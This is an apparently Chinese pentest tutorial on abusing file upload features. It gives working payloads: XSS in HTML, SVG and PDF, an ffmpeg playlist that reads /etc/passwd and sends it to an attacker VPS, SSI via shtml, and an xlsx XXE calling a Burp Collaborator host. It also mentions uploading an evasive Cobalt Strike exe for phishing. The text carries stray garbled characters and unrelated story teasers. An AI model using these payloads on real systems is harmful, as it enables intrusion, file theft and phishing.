web安全-文件上傳利用

前言

在滲透測(cè)試中和橙,文件上傳漏洞利用方式一般是上傳可以解析的webshell木馬妹懒,獲取服務(wù)器命令執(zhí)行權(quán)限篓叶,隨著開發(fā)安全意識(shí)和水平的不斷提高艺玲,通過文件上傳直接getshell的情況越來越少,當(dāng)目標(biāo)無法直接上傳getshell時(shí)斑胜,可能還存在其它一些利用方式控淡。

網(wǎng)站腳本文件

常指asp、aspx止潘、jsp掺炭、php后綴的網(wǎng)站腳本文件,通過訪問上傳的webshell執(zhí)行系統(tǒng)命令凭戴,獲取服務(wù)器權(quán)限涧狮。


其它文件利用

當(dāng)文件上傳點(diǎn)無法上傳webshell時(shí),可以通過上傳其它后綴文件構(gòu)造其它漏洞么夫。

html文件

利用方式:上傳html文件構(gòu)造xss漏洞

<script>alert('xss')</script>

svg文件

利用方式:上傳html文件構(gòu)造xss漏洞

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>

pdf文件

利用方式:構(gòu)造xss或url跳轉(zhuǎn)的pdf文件上傳
新建一個(gè)空白頁



在“頁面屬性”對(duì)話框單擊“動(dòng)作”標(biāo)簽者冤,再從“選擇動(dòng)作”下拉菜單中選擇“運(yùn)行 JavaScript”命令,然后單擊【添加】按鈕档痪,彈出 JavaScript 編輯器對(duì)話框



在彈出的對(duì)話框中輸入代碼:
app.alert('XSS');

保存上傳到網(wǎng)站上涉枫,使用瀏覽器訪問成功執(zhí)行了xss代碼。


exe文件

利用方式:上傳exe到目標(biāo)網(wǎng)站用于文件釣魚
制作免殺exe cs木馬腐螟,上傳到目標(biāo)網(wǎng)站愿汰,通過社工手段進(jìn)行文件釣魚困后。


mp4、avi文件

利用方式:目標(biāo)使用了ffmpeg有漏洞版本衬廷,上傳mp4/avi進(jìn)行文件讀取/SSRF
內(nèi)容保存成test.avi摇予,上傳到被攻擊服務(wù)器。

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://vps:port/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

保存成header.m3u8吗跋,上傳到公網(wǎng)vps

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://vps:port?

訪問上傳的avi文件侧戴,vps接收到訪問日志


shtml文件

利用方式:如果目標(biāo)服務(wù)器開啟了SSI與CGI支持,可以上傳shtml文件小腊,執(zhí)行ssi命令。
搭建測(cè)試環(huán)境:
打開apache的配置文件httpd.conf久窟。找到 LoadModule ssl_module modules/mod_ssl.so 命令秩冈,去掉注釋。


去掉
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
的注釋

Indexes 或FollowSymLinks修改為:
Options +Indexes +FollowSymLinks +ExecCGI +Includes +IncludesNOEXEC

修改vhosts文件 增加Includes

重啟apache斥扛,上傳shtml文件入问。

成功執(zhí)行了ssi命令。

相關(guān)ssi命令可參考:https://www.secpulse.com/archives/66934.html

xlsx文件

利用方式:當(dāng)遇到接受Excel文件進(jìn)行上傳和處理的目標(biāo)應(yīng)用程序稀颁,則可能存在xxe漏洞芬失。
原理:現(xiàn)代Excel文件實(shí)際上只是XML文檔的zip文件,稱為Office Open XML格式或OOXML匾灶。
當(dāng)應(yīng)用程序處理上傳的xlsx文件時(shí)需要解析XML棱烂,如果解析器未做安全配置,則可能導(dǎo)致xxe漏洞阶女。
創(chuàng)建一個(gè)xlsx文檔颊糜,更改后綴為zip,使用壓縮工具解壓縮秃踩。



打開Burp Suite Professional衬鱼,單擊Burp菜單并選擇“Burp Collaborator client”將其打開,復(fù)制到粘貼板。



找到Content_Types.xml文件憔杨,插入xxe代碼到文件中鸟赫。
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gdx7uyvhtysav8fbqbp8xf5utlzcn1.burpcollaborator.net"> ]>
<x>&xxe;</x>

重新壓縮為zip文件,更改后綴為xlsx消别。
上傳xlsx文檔到目標(biāo)服務(wù)器抛蚤,如果沒有禁用外部實(shí)體,就會(huì)存在XXE漏洞寻狂,burp接收到請(qǐng)求霉颠。


參考鏈接

https://www.freebuf.com/column/142775.html
https://www.secpulse.com/archives/66934.html
https://www.xp.cn/b.php/15190.html
https://www.secpulse.com/archives/45894.html
http://www.xaheimi.com/jianzhan/103.html
http://www.john30n.com/index.php/shentou/44.html
[http://www.john30n.com/index.php/shentou/44.html]
https://xz.aliyun.com/t/3741

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市荆虱,隨后出現(xiàn)的幾起案子蒿偎,更是在濱河造成了極大的恐慌朽们,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,122評(píng)論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件诉位,死亡現(xiàn)場(chǎng)離奇詭異骑脱,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)苍糠,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,070評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門叁丧,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人岳瞭,你說我怎么就攤上這事拥娄。” “怎么了瞳筏?”我有些...
    開封第一講書人閱讀 164,491評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵稚瘾,是天一觀的道長。 經(jīng)常有香客問我姚炕,道長摊欠,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,636評(píng)論 1 293
  • 正文 為了忘掉前任柱宦,我火速辦了婚禮些椒,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘掸刊。我一直安慰自己免糕,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,676評(píng)論 6 392
  • 文/花漫 我一把揭開白布忧侧。 她就那樣靜靜地躺著说墨,像睡著了一般。 火紅的嫁衣襯著肌膚如雪苍柏。 梳的紋絲不亂的頭發(fā)上尼斧,一...
    開封第一講書人閱讀 51,541評(píng)論 1 305
  • 那天,我揣著相機(jī)與錄音试吁,去河邊找鬼棺棵。 笑死,一個(gè)胖子當(dāng)著我的面吹牛熄捍,可吹牛的內(nèi)容都是我干的烛恤。 我是一名探鬼主播,決...
    沈念sama閱讀 40,292評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼余耽,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼缚柏!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起碟贾,我...
    開封第一講書人閱讀 39,211評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤币喧,失蹤者是張志新(化名)和其女友劉穎轨域,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體杀餐,經(jīng)...
    沈念sama閱讀 45,655評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡干发,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,846評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了史翘。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片枉长。...
    茶點(diǎn)故事閱讀 39,965評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖琼讽,靈堂內(nèi)的尸體忽然破棺而出必峰,到底是詐尸還是另有隱情,我是刑警寧澤钻蹬,帶...
    沈念sama閱讀 35,684評(píng)論 5 347
  • 正文 年R本政府宣布吼蚁,位于F島的核電站,受9級(jí)特大地震影響脉让,放射性物質(zhì)發(fā)生泄漏桂敛。R本人自食惡果不足惜功炮,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,295評(píng)論 3 329
  • 文/蒙蒙 一溅潜、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧薪伏,春花似錦滚澜、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,894評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至塘淑,卻和暖如春萝招,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背存捺。 一陣腳步聲響...
    開封第一講書人閱讀 33,012評(píng)論 1 269
  • 我被黑心中介騙來泰國打工槐沼, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人捌治。 一個(gè)月前我還...
    沈念sama閱讀 48,126評(píng)論 3 370
  • 正文 我出身青樓岗钩,卻偏偏與公主長得像,于是被迫代替她去往敵國和親肖油。 傳聞我的和親對(duì)象是個(gè)殘疾皇子兼吓,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,914評(píng)論 2 355